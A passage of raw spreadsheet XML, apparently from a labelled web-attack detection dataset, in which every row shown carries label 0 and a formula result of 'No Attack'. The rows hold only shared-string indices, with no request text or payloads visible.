        <v>0</v>
      </c>
      <c r="C32834" s="7" t="str">
        <f t="shared" si="512"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32835" s="1" t="s">
        <v>20685</v>
      </c>
      <c r="B32835">
        <v>0</v>
      </c>
      <c r="C32835" s="7" t="str">
        <f t="shared" ref="C32835:C32898" si="513">IF(B32835=0,"No Attack", IF(B32835=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32836" s="1" t="s">
        <v>34832</v>
      </c>
      <c r="B32836">
        <v>0</v>
      </c>
      <c r="C32836" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32837" s="1" t="s">
        <v>28148</v>
      </c>
      <c r="B32837">
        <v>0</v>
      </c>
      <c r="C32837" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32838" s="1" t="s">
        <v>32373</v>
      </c>
      <c r="B32838">
        <v>0</v>
      </c>
      <c r="C32838" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32839" s="1" t="s">
        <v>23635</v>
      </c>
      <c r="B32839">
        <v>0</v>
      </c>
      <c r="C32839" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32840" s="1" t="s">
        <v>31378</v>
      </c>
      <c r="B32840">
        <v>0</v>
      </c>
      <c r="C32840" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32841" s="1" t="s">
        <v>36100</v>
      </c>
      <c r="B32841">
        <v>0</v>
      </c>
      <c r="C32841" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32842" s="1" t="s">
        <v>31108</v>
      </c>
      <c r="B32842">
        <v>0</v>
      </c>
      <c r="C32842" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32843" s="1" t="s">
        <v>35345</v>
      </c>
      <c r="B32843">
        <v>0</v>
      </c>
      <c r="C32843" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32844" s="1" t="s">
        <v>28044</v>
      </c>
      <c r="B32844">
        <v>0</v>
      </c>
      <c r="C32844" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32845" s="1" t="s">
        <v>33660</v>
      </c>
      <c r="B32845">
        <v>0</v>
      </c>
      <c r="C32845" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32846" s="1" t="s">
        <v>20614</v>
      </c>
      <c r="B32846">
        <v>0</v>
      </c>
      <c r="C32846" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32847" s="1" t="s">
        <v>23926</v>
      </c>
      <c r="B32847">
        <v>0</v>
      </c>
      <c r="C32847" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32848" s="1" t="s">
        <v>23074</v>
      </c>
      <c r="B32848">
        <v>0</v>
      </c>
      <c r="C32848" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32849" s="1" t="s">
        <v>35138</v>
      </c>
      <c r="B32849">
        <v>0</v>
      </c>
      <c r="C32849" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32850" s="1" t="s">
        <v>29743</v>
      </c>
      <c r="B32850">
        <v>0</v>
      </c>
      <c r="C32850" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32851" s="1" t="s">
        <v>35101</v>
      </c>
      <c r="B32851">
        <v>0</v>
      </c>
      <c r="C32851" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32852" s="1" t="s">
        <v>28426</v>
      </c>
      <c r="B32852">
        <v>0</v>
      </c>
      <c r="C32852" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32853" s="1" t="s">
        <v>32212</v>
      </c>
      <c r="B32853">
        <v>0</v>
      </c>
      <c r="C32853" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32854" s="1" t="s">
        <v>27273</v>
      </c>
      <c r="B32854">
        <v>0</v>
      </c>
      <c r="C32854" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32855" s="1" t="s">
        <v>27462</v>
      </c>
      <c r="B32855">
        <v>0</v>
      </c>
      <c r="C32855" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32856" s="1" t="s">
        <v>22832</v>
      </c>
      <c r="B32856">
        <v>0</v>
      </c>
      <c r="C32856" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32857" s="1" t="s">
        <v>22652</v>
      </c>
      <c r="B32857">
        <v>0</v>
      </c>
      <c r="C32857" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32858" s="1" t="s">
        <v>31784</v>
      </c>
      <c r="B32858">
        <v>0</v>
      </c>
      <c r="C32858" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32859" s="1" t="s">
        <v>36848</v>
      </c>
      <c r="B32859">
        <v>0</v>
      </c>
      <c r="C32859" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32860" s="1" t="s">
        <v>23660</v>
      </c>
      <c r="B32860">
        <v>0</v>
      </c>
      <c r="C32860" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32861" s="1" t="s">
        <v>21548</v>
      </c>
      <c r="B32861">
        <v>0</v>
      </c>
      <c r="C32861" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32862" s="1" t="s">
        <v>23575</v>
      </c>
      <c r="B32862">
        <v>0</v>
      </c>
      <c r="C32862" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32863" s="1" t="s">
        <v>31104</v>
      </c>
      <c r="B32863">
        <v>0</v>
      </c>
      <c r="C32863" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32864" s="1" t="s">
        <v>28739</v>
      </c>
      <c r="B32864">
        <v>0</v>
      </c>
      <c r="C32864" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32865" s="1" t="s">
        <v>22633</v>
      </c>
      <c r="B32865">
        <v>0</v>
      </c>
      <c r="C32865" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32866" s="1" t="s">
        <v>21668</v>
      </c>
      <c r="B32866">
        <v>0</v>
      </c>
      <c r="C32866" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32867" s="1" t="s">
        <v>24079</v>
      </c>
      <c r="B32867">
        <v>0</v>
      </c>
      <c r="C32867" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32868" s="1" t="s">
        <v>21975</v>
      </c>
      <c r="B32868">
        <v>0</v>
      </c>
      <c r="C32868" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32869" s="1" t="s">
        <v>29868</v>
      </c>
      <c r="B32869">
        <v>0</v>
      </c>
      <c r="C32869" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32870" s="1" t="s">
        <v>21972</v>
      </c>
      <c r="B32870">
        <v>0</v>
      </c>
      <c r="C32870" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32871" s="1" t="s">
        <v>20198</v>
      </c>
      <c r="B32871">
        <v>0</v>
      </c>
      <c r="C32871" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32872" s="1" t="s">
        <v>31648</v>
      </c>
      <c r="B32872">
        <v>0</v>
      </c>
      <c r="C32872" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32873" s="1" t="s">
        <v>27028</v>
      </c>
      <c r="B32873">
        <v>0</v>
      </c>
      <c r="C32873" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32874" s="1" t="s">
        <v>33455</v>
      </c>
      <c r="B32874">
        <v>0</v>
      </c>
      <c r="C32874" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32875" s="1" t="s">
        <v>30332</v>
      </c>
      <c r="B32875">
        <v>0</v>
      </c>
      <c r="C32875" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32876" s="1" t="s">
        <v>22808</v>
      </c>
      <c r="B32876">
        <v>0</v>
      </c>
      <c r="C32876" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32877" s="1" t="s">
        <v>30059</v>
      </c>
      <c r="B32877">
        <v>0</v>
      </c>
      <c r="C32877" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32878" s="1" t="s">
        <v>37496</v>
      </c>
      <c r="B32878">
        <v>0</v>
      </c>
      <c r="C32878" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32879" s="1" t="s">
        <v>23555</v>
      </c>
      <c r="B32879">
        <v>0</v>
      </c>
      <c r="C32879" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32880" s="1" t="s">
        <v>32454</v>
      </c>
      <c r="B32880">
        <v>0</v>
      </c>
      <c r="C32880" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32881" s="1" t="s">
        <v>36094</v>
      </c>
      <c r="B32881">
        <v>0</v>
      </c>
      <c r="C32881" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32882" s="1" t="s">
        <v>20489</v>
      </c>
      <c r="B32882">
        <v>0</v>
      </c>
      <c r="C32882" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32883" s="1" t="s">
        <v>29352</v>
      </c>
      <c r="B32883">
        <v>0</v>
      </c>
      <c r="C32883" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32884" s="1" t="s">
        <v>27100</v>
      </c>
      <c r="B32884">
        <v>0</v>
      </c>
      <c r="C32884" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32885" s="1" t="s">
        <v>29168</v>
      </c>
      <c r="B32885">
        <v>0</v>
      </c>
      <c r="C32885" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32886" s="1" t="s">
        <v>36413</v>
      </c>
      <c r="B32886">
        <v>0</v>
      </c>
      <c r="C32886" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32887" s="1" t="s">
        <v>31912</v>
      </c>
      <c r="B32887">
        <v>0</v>
      </c>
      <c r="C32887" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32888" s="1" t="s">
        <v>31093</v>
      </c>
      <c r="B32888">
        <v>0</v>
      </c>
      <c r="C32888" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32889" s="1" t="s">
        <v>29538</v>
      </c>
      <c r="B32889">
        <v>0</v>
      </c>
      <c r="C32889" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32890" s="1" t="s">
        <v>28681</v>
      </c>
      <c r="B32890">
        <v>0</v>
      </c>
      <c r="C32890" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32891" s="1" t="s">
        <v>20786</v>
      </c>
      <c r="B32891">
        <v>0</v>
      </c>
      <c r="C32891" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32892" s="1" t="s">
        <v>23929</v>
      </c>
      <c r="B32892">
        <v>0</v>
      </c>
      <c r="C32892" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32893" s="1" t="s">
        <v>32690</v>
      </c>
      <c r="B32893">
        <v>0</v>
      </c>
      <c r="C32893" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32894" s="1" t="s">
        <v>33067</v>
      </c>
      <c r="B32894">
        <v>0</v>
      </c>
      <c r="C32894" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32895" s="1" t="s">
        <v>34037</v>
      </c>
      <c r="B32895">
        <v>0</v>
      </c>
      <c r="C32895" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32896" s="1" t="s">
        <v>34859</v>
      </c>
      <c r="B32896">
        <v>0</v>
      </c>
      <c r="C32896" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32897" s="1" t="s">
        <v>30199</v>
      </c>
      <c r="B32897">
        <v>0</v>
      </c>
      <c r="C32897" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32898" s="1" t="s">
        <v>22085</v>
      </c>
      <c r="B32898">
        <v>0</v>
      </c>
      <c r="C32898" s="7" t="str">
        <f t="shared" si="513"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32899" s="1" t="s">
        <v>30659</v>
      </c>
      <c r="B32899">
        <v>0</v>
      </c>
      <c r="C32899" s="7" t="str">
        <f t="shared" ref="C32899:C32962" si="514">IF(B32899=0,"No Attack", IF(B32899=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32900" s="1" t="s">
        <v>27395</v>
      </c>
      <c r="B32900">
        <v>0</v>
      </c>
      <c r="C32900" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32901" s="1" t="s">
        <v>30879</v>
      </c>
      <c r="B32901">
        <v>0</v>
      </c>
      <c r="C32901" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32902" s="1" t="s">
        <v>34739</v>
      </c>
      <c r="B32902">
        <v>0</v>
      </c>
      <c r="C32902" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32903" s="1" t="s">
        <v>22524</v>
      </c>
      <c r="B32903">
        <v>0</v>
      </c>
      <c r="C32903" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32904" s="1" t="s">
        <v>23364</v>
      </c>
      <c r="B32904">
        <v>0</v>
      </c>
      <c r="C32904" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32905" s="1" t="s">
        <v>27183</v>
      </c>
      <c r="B32905">
        <v>0</v>
      </c>
      <c r="C32905" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32906" s="1" t="s">
        <v>34664</v>
      </c>
      <c r="B32906">
        <v>0</v>
      </c>
      <c r="C32906" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32907" s="1" t="s">
        <v>34512</v>
      </c>
      <c r="B32907">
        <v>0</v>
      </c>
      <c r="C32907" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32908" s="1" t="s">
        <v>32772</v>
      </c>
      <c r="B32908">
        <v>0</v>
      </c>
      <c r="C32908" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32909" s="1" t="s">
        <v>20582</v>
      </c>
      <c r="B32909">
        <v>0</v>
      </c>
      <c r="C32909" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32910" s="1" t="s">
        <v>21908</v>
      </c>
      <c r="B32910">
        <v>0</v>
      </c>
      <c r="C32910" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32911" s="1" t="s">
        <v>34469</v>
      </c>
      <c r="B32911">
        <v>0</v>
      </c>
      <c r="C32911" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32912" s="1" t="s">
        <v>24251</v>
      </c>
      <c r="B32912">
        <v>0</v>
      </c>
      <c r="C32912" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32913" s="1" t="s">
        <v>35734</v>
      </c>
      <c r="B32913">
        <v>0</v>
      </c>
      <c r="C32913" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32914" s="1" t="s">
        <v>33396</v>
      </c>
      <c r="B32914">
        <v>0</v>
      </c>
      <c r="C32914" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32915" s="1" t="s">
        <v>27567</v>
      </c>
      <c r="B32915">
        <v>0</v>
      </c>
      <c r="C32915" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32916" s="1" t="s">
        <v>30100</v>
      </c>
      <c r="B32916">
        <v>0</v>
      </c>
      <c r="C32916" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32917" s="1" t="s">
        <v>33743</v>
      </c>
      <c r="B32917">
        <v>0</v>
      </c>
      <c r="C32917" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32918" s="1" t="s">
        <v>23841</v>
      </c>
      <c r="B32918">
        <v>0</v>
      </c>
      <c r="C32918" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32919" s="1" t="s">
        <v>29456</v>
      </c>
      <c r="B32919">
        <v>0</v>
      </c>
      <c r="C32919" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32920" s="1" t="s">
        <v>35933</v>
      </c>
      <c r="B32920">
        <v>0</v>
      </c>
      <c r="C32920" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32921" s="1" t="s">
        <v>23957</v>
      </c>
      <c r="B32921">
        <v>0</v>
      </c>
      <c r="C32921" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32922" s="1" t="s">
        <v>29644</v>
      </c>
      <c r="B32922">
        <v>0</v>
      </c>
      <c r="C32922" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32923" s="1" t="s">
        <v>32924</v>
      </c>
      <c r="B32923">
        <v>0</v>
      </c>
      <c r="C32923" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32924" s="1" t="s">
        <v>27717</v>
      </c>
      <c r="B32924">
        <v>0</v>
      </c>
      <c r="C32924" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32925" s="1" t="s">
        <v>21641</v>
      </c>
      <c r="B32925">
        <v>0</v>
      </c>
      <c r="C32925" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32926" s="1" t="s">
        <v>30471</v>
      </c>
      <c r="B32926">
        <v>0</v>
      </c>
      <c r="C32926" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32927" s="1" t="s">
        <v>31493</v>
      </c>
      <c r="B32927">
        <v>0</v>
      </c>
      <c r="C32927" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32928" s="1" t="s">
        <v>30460</v>
      </c>
      <c r="B32928">
        <v>0</v>
      </c>
      <c r="C32928" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32929" s="1" t="s">
        <v>30816</v>
      </c>
      <c r="B32929">
        <v>0</v>
      </c>
      <c r="C32929" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32930" s="1" t="s">
        <v>24069</v>
      </c>
      <c r="B32930">
        <v>0</v>
      </c>
      <c r="C32930" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32931" s="1" t="s">
        <v>35235</v>
      </c>
      <c r="B32931">
        <v>0</v>
      </c>
      <c r="C32931" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32932" s="1" t="s">
        <v>32354</v>
      </c>
      <c r="B32932">
        <v>0</v>
      </c>
      <c r="C32932" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32933" s="1" t="s">
        <v>34895</v>
      </c>
      <c r="B32933">
        <v>0</v>
      </c>
      <c r="C32933" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32934" s="1" t="s">
        <v>29425</v>
      </c>
      <c r="B32934">
        <v>0</v>
      </c>
      <c r="C32934" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32935" s="1" t="s">
        <v>28242</v>
      </c>
      <c r="B32935">
        <v>0</v>
      </c>
      <c r="C32935" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32936" s="1" t="s">
        <v>33325</v>
      </c>
      <c r="B32936">
        <v>0</v>
      </c>
      <c r="C32936" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32937" s="1" t="s">
        <v>32495</v>
      </c>
      <c r="B32937">
        <v>0</v>
      </c>
      <c r="C32937" s="7" t="str">
        <f t="shared" si="514"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="32938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32938" s="1" t="s">
        <v>35932</v>
      </c>
      <c r="B32938">
        <v>0</v>
      </c>
